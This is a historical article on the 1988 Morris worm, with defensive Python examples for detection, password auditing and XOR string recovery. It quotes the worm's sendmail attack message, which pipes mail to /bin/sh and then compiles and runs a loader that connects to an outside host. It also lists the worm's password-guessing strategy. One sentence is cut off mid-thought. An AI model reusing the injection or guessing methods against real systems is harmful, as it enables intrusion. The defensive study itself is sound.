
Morris worm - it was the first
On November 2, 1988, the ARPANET network was attacked by a program that later became known as the Morris Worm, named after its creator, Cornell University student Robert Morris Jr. ARPANET (Advanced Research Projects Agency Network) was created in 1969 at the initiative of the Defense Advanced Research Projects Agency (DARPA) of the US Department of Defense and was the prototype of the Internet. The network was built for researchers in computer engineering and technology to exchange messages, programs and data sets between the largest research centers, laboratories, universities, government organizations and private firms working for the US Department of Defense (DoD). It was on a DoD order that one of the three most common transport layer protocols of the OSI model, TCP/IP, was developed; in 1983 it became the main protocol of ARPANET. By the end of the 1980s the network numbered several tens of thousands of computers. ARPANET ceased to exist in June 1990.
The Morris Worm was the first malware in the history of computing to use automatic distribution over the network. To do so it exploited several vulnerabilities in network services, as well as weaknesses in computer systems that stemmed from the insufficient attention paid to security at the time.
According to Robert Morris, the worm was created for research purposes; its code contained no “payload” (destructive functions). However, because of errors in its algorithms, the spread of the worm caused a “denial of service”: computers were busy making numerous copies of the worm and stopped responding to operator commands. The Morris Worm practically paralyzed computers on ARPANET for up to five days. Downtime was estimated at no less than 8 million hours, plus over 1 million hours spent restoring systems. Total losses were estimated at 98 million dollars, made up of direct and indirect losses.
Direct losses included ($32 million):
- stopping, testing and rebooting 42,700 machines;
- identifying and removing the worm, cleaning memory and restoring 6,200 machines to health;
- analysis, disassembly and documentation of the worm code;
- repair and testing of Unix systems.
Indirect losses included ($66 million):
- loss of computer time due to lack of network access;
- loss of user access to the network.
These estimates must, however, be treated with great caution.
Structurally, the worm consisted of three parts: a “head” and two “tails”. The “head” was C source code (99 lines) that was compiled directly on the remote machine. The “tails” were binary files identical in source code and algorithms but compiled for different architectures; according to Morris, VAX and SUN were chosen as the target hardware platforms. The “head” was delivered using the following methods:
- use of the debug mode in sendmail;
- exploitation of a buffer overflow vulnerability in the fingerd network service;
- guessing the login and password for remote program execution (rexec);
- calling the remote shell (rsh) with a guessed username and password or via the trust mechanism.
Sendmail is the oldest network service for receiving and sending mail via SMTP. At the time the worm spread, Sendmail had an undocumented feature: the developers had built in a debug mode that should not have been present in the production version of the program but was left in by mistake. One of the features of debug mode was that a mail message could be handed not to Sendmail itself but to another program. Example of a worm email:
debug
mail from:
rcpt to: <"| sed -e '1,/^$/d' | /bin/sh; exit 0">
data
cd /usr/tmp
cat > x14481910.c << 'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.c; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
As you can see, the headers are stripped from the body of the message (using the sed stream editor) and the “head” source code is saved to a file. The shell is then instructed to compile the “head”, launch the resulting executable and erase the temporary files.
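The two features of this message that a mail administrator could have alarmed on are the DEBUG command itself and a recipient that is a shell pipeline rather than a mailbox. The following is an added example (not from the article and not the worm's code) that scans an SMTP session transcript for both, and also reproduces what the sed expression does to the delivered message. The transcripts are constructed: the worm one is copied from the message above with the source file left as a placeholder, the benign one is made up for contrast.

```python
import re

# Constructed from the message quoted in the article. The "mail from" argument
# is blank there, so it is blank here too; the source text is a placeholder.
WORM_TRANSCRIPT = """\
debug
mail from:
rcpt to: <"| sed -e '1,/^$/d' | /bin/sh; exit 0">
data
cd /usr/tmp
cat > x14481910.c << 'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.c; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
"""

# An ordinary delivery, constructed for contrast.
BENIGN_TRANSCRIPT = """\
helo client.example
mail from: <alice@example.org>
rcpt to: <bob@example.org>
data
Subject: hello

see you at the meeting
.
quit
"""

RCPT_RE = re.compile(r"^rcpt\s*to:\s*<(.*)>\s*$", re.IGNORECASE)
SHELL_RE = re.compile(r"/bin/(sh|csh|ksh|bash)\b")


def analyze_smtp(transcript):
    """Return the findings for one SMTP session.

    'debug-command'   - the client issued DEBUG, which the vulnerable sendmail
                        still accepted in production.
    'pipe-recipient'  - RCPT TO names a program ("|...") instead of a mailbox.
    'shell-recipient' - that program pipeline ends in a shell interpreter.
    """
    findings = []
    in_data = False
    for raw in transcript.splitlines():
        line = raw.strip()
        if in_data:
            if line == ".":          # lone dot terminates the DATA section
                in_data = False
            continue                 # message body lines are not commands
        if line.lower() == "debug":
            findings.append("debug-command")
        elif line.lower() == "data":
            in_data = True
        else:
            m = RCPT_RE.match(line)
            if m:
                rcpt = m.group(1).strip().strip('"')
                if rcpt.startswith("|"):
                    findings.append("pipe-recipient")
                    if SHELL_RE.search(rcpt):
                        findings.append("shell-recipient")
    return findings


def strip_headers(message):
    """Equivalent of `sed -e '1,/^$/d'`: delete from the first line through the
    first empty line, i.e. drop the mail headers and keep only the body."""
    lines = message.split("\n")
    for i, line in enumerate(lines):
        if line == "":
            return "\n".join(lines[i + 1:])
    return ""    # no blank line at all: sed deletes the whole input


if __name__ == "__main__":
    print(analyze_smtp(WORM_TRANSCRIPT))    # three findings
    print(analyze_smtp(BENIGN_TRANSCRIPT))  # none
```

The body is skipped deliberately: the dangerous part of this message is entirely in the envelope commands, so a check like this works on the SMTP dialogue without having to understand the shell script it carries.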
To exploit the fingerd vulnerability, the worm sent a specially prepared 536-byte string that ultimately resulted in a call to execve("/bin/sh", 0, 0). This worked only on VAX computers running 4.3BSD; on SunOS-based SUN computers this vulnerability was not found.
For distribution via rexec and rsh, a list of users on the local machine was collected. From it, the most likely passwords were guessed, in the hope that many users had the same names and passwords on all machines on the network, which turned out to be not far from the truth. In addition to password guessing, rsh offered a trust mechanism, a simplified authentication based on the IP address of the remote machine. Such addresses were stored in the /etc/hosts.equiv and .rhosts files. On most computers the trust was mutual, so with high probability the list of addresses the worm found in these files allowed it to log into the remote system via rsh without a password.
When guessing passwords, the worm tried the following options:
- empty;
- the user name (user);
- the reversed user name (resu);
- the doubled user name (useruser);
- the user's first or last name (John, Smith);
- the first or last name in lower case (john, smith);
- a built-in dictionary of 432 words;
- the file /usr/dict/words, containing about 24,000 words and used in 4.3BSD (and other systems) as a spelling dictionary. If a word began with a capital letter, the lower-case variant was also checked.
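The guessing strategy above doubles as a password policy: a password that falls into any of these classes for its own account is one the worm would have found. The following is an added example, not from the article and not the worm's routine, that builds the candidate set the list describes and uses it two ways: to reject a weak password at the moment it is set, and to audit stored hashes the way the worm compared crypt(3) output. The dictionary, the word list, the salted SHA-256 stand-in for crypt(3) and the account records are all constructed for the example.

```python
import hashlib

# Constructed stand-ins for the worm's 432-word dictionary and /usr/dict/words.
BUILTIN_DICT = {"aaa", "academia", "cascades", "password", "wombat"}
SYSTEM_WORDS = ["Aardvark", "bicycle", "Cornell", "sendmail"]


def morris_candidates(username, first_name="", last_name="", words=SYSTEM_WORDS):
    """Candidate passwords for one account, following the article's list."""
    cands = {"", username, username[::-1], username * 2}
    for name in (first_name, last_name):
        if name:
            cands.add(name)           # as written, e.g. John, Smith
            cands.add(name.lower())   # lower case, e.g. john, smith
    cands |= BUILTIN_DICT
    for w in words:
        cands.add(w)
        if w[:1].isupper():
            cands.add(w.lower())      # capitalised words also tried in lower case
    return cands


def check_password(password, username, first_name="", last_name=""):
    """Policy check at set time: (ok, reason)."""
    if password in morris_candidates(username, first_name, last_name):
        return False, "derivable from account data or a common word"
    return True, "not in the Morris-style guess list"


def hash_pw(password, salt):
    # Salted hash standing in for crypt(3); constructed for the example.
    return hashlib.sha256((salt + password).encode()).hexdigest()


def make_record(username, first, last, salt, password):
    return {"user": username, "first": first, "last": last,
            "salt": salt, "hash": hash_pw(password, salt)}


# Constructed account records; the third one is not derivable from the list.
ACCOUNTS = [
    make_record("jsmith", "John", "Smith", "ab", "smith"),
    make_record("rtm", "Robert", "Morris", "cd", "mtr"),
    make_record("alice", "Alice", "Liddell", "ef", "Tr0ub4dor&3"),
]


def audit(accounts):
    """Usernames whose stored hash matches some candidate for that account.
    Hashing each guess and comparing to the stored value is exactly what the
    worm did with crypt(3); here it is turned into a defender's audit."""
    weak = []
    for acct in accounts:
        for cand in morris_candidates(acct["user"], acct["first"], acct["last"]):
            if hash_pw(cand, acct["salt"]) == acct["hash"]:
                weak.append(acct["user"])
                break
    return weak


if __name__ == "__main__":
    print(audit(ACCOUNTS))
    print(check_password("resu", "user"))
```

The audit only needs the salted hashes, not plaintext, which is why moving hashes out of a world-readable /etc/passwd (discussed further down) mattered: without the hashes, an attacker cannot run this comparison offline and every wrong guess has to go through the login path, where delays apply.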
The combination of several distribution methods significantly boosted the worm's spread across the network. To find remote computers, the network was scanned using information from the routing table and the infected system's own IP address.
The worm used several tricks to make it harder for administrators to detect:
- it deleted its own executable after launch;
- all error messages were disabled and the core dump size was set to zero;
- the executable was saved under the name sh, the name of the Bourne shell, so the worm was camouflaged in the process list;
- approximately every three minutes a child process was forked and the parent terminated, so the worm's pid kept changing and the running time shown in the process list was reset;
- all text strings were encoded with xor 81h.
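The last trick defeats the simplest triage step, running strings(1) over the binary, but a single-byte XOR is its own inverse and a known plaintext recovers the key in at most 256 tries. The following is an added example (not from the article or the worm) of how an analyst would recover the strings: a strings(1)-style scanner, a decoder, and a known-plaintext key search. The sample blob is constructed by encoding a few paths the article mentions with xor 81h and padding them with filler bytes that stand in for machine code.

```python
KEY = 0x81


def xor_bytes(data, key=KEY):
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def printable_strings(data, min_len=4):
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    out, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def recover_xor_strings(blob, key=KEY, min_len=4):
    """Decode the whole blob with the key, then extract printable runs."""
    return printable_strings(xor_bytes(blob, key), min_len)


def find_single_byte_key(blob, known_plaintext):
    """Known-plaintext search: every key under which the decoded blob contains
    known_plaintext. A string the sample must use (such as a shell path) is a
    good marker."""
    return [k for k in range(256) if known_plaintext in xor_bytes(blob, k)]


# Constructed sample: strings from the article, xor 81h encoded, separated by
# filler bytes that stand in for surrounding code.
SAMPLE_STRINGS = [b"/usr/tmp", b"/bin/sh", b"/usr/dict/words", b"sh"]
FILLER = bytes([0x00, 0x81, 0xFF, 0x10])
SAMPLE_BLOB = b"".join(FILLER + xor_bytes(s) for s in SAMPLE_STRINGS) + FILLER


if __name__ == "__main__":
    print(printable_strings(SAMPLE_BLOB))               # nothing: strings(1) sees no text
    print(find_single_byte_key(SAMPLE_BLOB, b"/bin/sh"))  # [129], i.e. 0x81
    print(recover_xor_strings(SAMPLE_BLOB))             # the encoded paths
```

Because every printable byte XOR 0x81 lands in 0xA1..0xFF, the raw blob yields no strings at all; the two-character "sh" is recovered by the decoder but dropped by the minimum-length filter, the same trade-off strings(1) makes.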
Despite the “grandeur” of the idea, the worm contained errors of both design and implementation. It was the incorrectly implemented check for whether the system was already infected that led to the mass spread of the worm, contrary to its author's intent. In practice, computers were infected many times over, which, first, quickly exhausted their resources and, second, fuelled the avalanche-like spread across the network. By some estimates, the Morris worm infected about 6,200 computers. The author himself, realizing the scale of what he had done, voluntarily surrendered to the authorities and told them everything. The hearing in his case ended on January 22, 1990. Initially Morris faced up to five years in prison and a fine of $25 thousand. In fact, the sentence was rather soft,
The Morris Worm incident made IT specialists think seriously about security. In particular, to harden systems, delays after incorrect password entry were introduced, and passwords were moved to /etc/shadow from the /etc/passwd file, which is readable by all users. But the most important consequence was the creation, in November 1988, of the CERT Coordination Center (CERT/CC), whose work addresses Internet security problems. The first CERT security bulletin, which appeared in December 1988, reported the vulnerabilities exploited by the worm. Notably, many of the techniques used by the Morris Worm, such as password brute forcing, compiling loader code on the remote *NIX host (as in Slapper), network scanning to find targets and so on, are also found in modern malware samples.
Interestingly, in the same year, 1988, the well-known programmer Peter Norton spoke out sharply in the press against the very idea that computer viruses exist, calling them a "myth" and comparing the noise around the topic to "stories about crocodiles living in New York's sewers." Just two years after Norton's statement, in 1990, the first version of Norton AntiVirus was released.
And finally, in 1988, under the impression of the Morris worm attack, the American Computer Equipment Association declared November 30 International Information Security Day, which is celebrated to this day.